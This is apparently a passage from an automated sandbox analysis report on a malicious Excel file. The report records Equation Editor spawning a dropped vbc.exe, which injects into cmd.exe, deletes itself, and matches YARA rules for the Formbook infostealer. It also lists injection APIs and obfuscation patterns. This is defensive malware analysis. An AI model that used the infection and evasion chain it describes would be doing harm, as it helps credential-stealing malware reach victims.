Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02291930 NtSetContextThread,		9_2_02291930
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FE24 NtWriteVirtualMemory,		9_2_0228FE24
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FEA0 NtReadVirtualMemory,		9_2_0228FEA0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FF34 NtQueueApcThread,		9_2_0228FF34
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FFFC NtCreateProcessEx,		9_2_0228FFFC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FC30 NtOpenProcess,		9_2_0228FC30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FC48 NtSetInformationFile,		9_2_0228FC48
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FC90 NtUnmapViewOfSection,		9_2_0228FC90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0228FD5C NtEnumerateKey,		9_2_0228FD5C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02291D80 NtSuspendThread,		9_2_02291D80
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00099D60 NtCreateFile,		9_2_00099D60
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00099E10 NtReadFile,		9_2_00099E10
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00099E90 NtClose,		9_2_00099E90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00099E0A NtReadFile,		9_2_00099E0A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00099E8F NtClose,		9_2_00099E8F

Contains functionality to communicate with device drivers

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A55A902: CreateFileW,DeviceIoControl,memcpy,CloseHandle,FindFirstStreamW,FindNextStreamW,FindClose,

9_2_4A55A902

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00035247		4_2_00035247
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00035A63		4_2_00035A63
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00381E00		4_2_00381E00
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0038A118		4_2_0038A118
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003872B2		4_2_003872B2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_003872C0		4_2_003872C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00381B88		4_2_00381B88
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00381B82		4_2_00381B82
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00385D70		4_2_00385D70
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00385D60		4_2_00385D60
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00381DF4		4_2_00381DF4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00035247		5_2_00035247
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00035A63		5_2_00035A63
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041E87B		7_2_0041E87B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00401030		7_2_00401030
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D88		7_2_00402D88
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402D90		7_2_00402D90
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00409E40		7_2_00409E40
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00409E3B		7_2_00409E3B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041DFAF		7_2_0041DFAF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00402FB0		7_2_00402FB0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3E0C6		7_2_00A3E0C6
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3E2E9		7_2_00A3E2E9
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AE63BF		7_2_00AE63BF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A663DB		7_2_00A663DB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A42305		7_2_00A42305
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A8A37B		7_2_00A8A37B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AC443E		7_2_00AC443E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AC05E3		7_2_00AC05E3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5C5F0		7_2_00A5C5F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A86540		7_2_00A86540
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A44680		7_2_00A44680
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4E6C1		7_2_00A4E6C1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AE2622		7_2_00AE2622
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A8A634		7_2_00A8A634
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4C7BC		7_2_00A4C7BC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A6286D		7_2_00A6286D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4C85C		7_2_00A4C85C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A429B2		7_2_00A429B2
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AE098E		7_2_00AE098E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AD49F5		7_2_00AD49F5
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A569FE		7_2_00A569FE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A8C920		7_2_00A8C920
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AECBA4		7_2_00AECBA4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AC6BCB		7_2_00AC6BCB
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AE2C9C		7_2_00AE2C9C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ACAC5E		7_2_00ACAC5E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A70D3B		7_2_00A70D3B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4CD5B		7_2_00A4CD5B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A72E2F		7_2_00A72E2F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5EE4C		7_2_00A5EE4C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ADCFB1		7_2_00ADCFB1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AB2FDC		7_2_00AB2FDC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A50F3F		7_2_00A50F3F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A6D005		7_2_00A6D005
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ABD06D		7_2_00ABD06D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A43040		7_2_00A43040
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A5905A		7_2_00A5905A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ACD13F		7_2_00ACD13F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AE1238		7_2_00AE1238
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3F3CF		7_2_00A3F3CF
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A47353		7_2_00A47353
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A75485		7_2_00A75485
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A51489		7_2_00A51489
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A7D47D		7_2_00A7D47D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AE35DA		7_2_00AE35DA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A4351F		7_2_00A4351F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AC579A		7_2_00AC579A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A757C3		7_2_00A757C3
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AD771D		7_2_00AD771D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ADF8EE		7_2_00ADF8EE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ABF8C4		7_2_00ABF8C4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AC394B		7_2_00AC394B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AC5955		7_2_00AC5955
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00AF3A83		7_2_00AF3A83
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A3FBD7		7_2_00A3FBD7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ACDBDA		7_2_00ACDBDA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A67B00		7_2_00A67B00
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ADFDDD		7_2_00ADFDDD
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00ACBF14		7_2_00ACBF14
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00A6DF7C		7_2_00A6DF7C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55B210		9_2_4A55B210
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A5612D2		9_2_4A5612D2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55276A		9_2_4A55276A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A55E46C		9_2_4A55E46C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_4A5639B6		9_2_4A5639B6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0229E2E9		9_2_0229E2E9
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A2305		9_2_022A2305
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022EA37B		9_2_022EA37B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_023463BF		9_2_023463BF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022C63DB		9_2_022C63DB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0229E0C6		9_2_0229E0C6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02342622		9_2_02342622
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022EA634		9_2_022EA634
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A4680		9_2_022A4680
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022AE6C1		9_2_022AE6C1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022AC7BC		9_2_022AC7BC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232443E		9_2_0232443E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022E6540		9_2_022E6540
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_023205E3		9_2_023205E3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022BC5F0		9_2_022BC5F0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0234CBA4		9_2_0234CBA4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02326BCB		9_2_02326BCB
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022C286D		9_2_022C286D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022AC85C		9_2_022AC85C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022EC920		9_2_022EC920
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A29B2		9_2_022A29B2
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0234098E		9_2_0234098E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_023349F5		9_2_023349F5
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022B69FE		9_2_022B69FE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022D2E2F		9_2_022D2E2F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022BEE4C		9_2_022BEE4C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022B0F3F		9_2_022B0F3F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0233CFB1		9_2_0233CFB1
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02312FDC		9_2_02312FDC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232AC5E		9_2_0232AC5E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02342C9C		9_2_02342C9C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022D0D3B		9_2_022D0D3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022ACD5B		9_2_022ACD5B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02341238		9_2_02341238
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A7353		9_2_022A7353
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0229F3CF		9_2_0229F3CF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022CD005		9_2_022CD005
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0231D06D		9_2_0231D06D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A3040		9_2_022A3040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022B905A		9_2_022B905A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232D13F		9_2_0232D13F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0233771D		9_2_0233771D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232579A		9_2_0232579A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022D57C3		9_2_022D57C3
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022DD47D		9_2_022DD47D
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022B1489		9_2_022B1489
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022D5485		9_2_022D5485
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022A351F		9_2_022A351F
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_023435DA		9_2_023435DA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02353A83		9_2_02353A83
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022C7B00		9_2_022C7B00
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232DBDA		9_2_0232DBDA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0229FBD7		9_2_0229FBD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0233F8EE		9_2_0233F8EE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0231F8C4		9_2_0231F8C4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_02325955		9_2_02325955
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232394B		9_2_0232394B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0232BF14		9_2_0232BF14
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_022CDF7C		9_2_022CDF7C
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0233FDDD		9_2_0233FDDD
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00082D88		9_2_00082D88
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00082D90		9_2_00082D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00089E3B		9_2_00089E3B
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00089E40		9_2_00089E40
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_0009DFAF		9_2_0009DFAF
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 9_2_00082FB0		9_2_00082FB0

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Request for quotation.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe	Code function: String function: 00A8373B appears 253 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A83F92 appears 132 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A3E2A8 appears 60 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00AAF970 appears 84 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00A3DF5C appears 137 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0229DF5C appears 137 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 022E3F92 appears 132 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 022E373B appears 253 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0229E2A8 appears 60 times
Source: C:\Windows\SysWOW64\cmd.exe	Code function: String function: 0230F970 appears 84 times

Yara signature match

Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2278876000.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2278962385.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2278791944.00000000001E0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2391163751.00000000001A0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2391208418.00000000001D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2249509307.0000000003419000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Binary contains paths to development resources

Source: explorer.exe, 00000008.00000000.2257114814.0000000003C40000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Classification label

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@13/3@2/2

Contains functionality to check free disk space

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A563185 GetDiskFreeSpaceExW,

9_2_4A563185

Creates files inside the user directory

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Request for quotation.xlsx

Jump to behavior

Creates temporary files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR1F71.tmp

Jump to behavior

Parts of this applications are using the .NET runtime (Probably coded in C#)

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Jump to behavior

Reads ini files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Reads software policies

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Reads the hosts file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Sample is known by Antivirus

Source: Request for quotation.xlsx	Virustotal: Detection: 33%
Source: Request for quotation.xlsx	ReversingLabs: Detection: 22%

Spawns processes

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'			Jump to behavior

Uses an in-process (OLE) Automation server

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Submission file is bigger than most known malware samples

Source: Request for quotation.xlsx

Static file information: File size 2205696 > 1048576

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Source:	Binary string: cmd.pdb,$ source: vbc.exe, 00000007.00000003.2278081880.000000000093C000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb,$WJ6$WJ@$WJ source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, cmd.exe
Source:	Binary string: cmd.pdb source: vbc.exe, 00000007.00000003.2278106711.000000000097A000.00000004.00000001.sdmp, cmd.exe

Document has a 'vbamacros' value indicative of goodware

Source: Request for quotation.xlsx

Initial sample: OLE indicators vbamacros = False

Document has an 'encrypted' value indicative of goodware

Source: Request for quotation.xlsx

Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Contains functionality to dynamically determine API calls

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 9_2_4A56D539 LoadLibraryW,GetProcAddress,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,

9_2_4A56D539

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041797C push ecx; retf		7_2_0041797F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00417936 push esp; retf		7_2_00417937
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0040E3E7 push ebp; iretd		7_2_0040E3E8
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00417C0D push ss; ret		7_2_00417C13
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041CEB5 push eax; ret		7_2_0041CF08
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041CF6C push eax; ret		7_2_0041CF72
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041CF02 push eax; ret		7_2_0041CF08
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041CF0B push eax; ret		7_2_0041CF72
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041D7C6 push cs; retf		7_2_0041D7C7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041678C push 00000050h; retf		7_2_0041678F
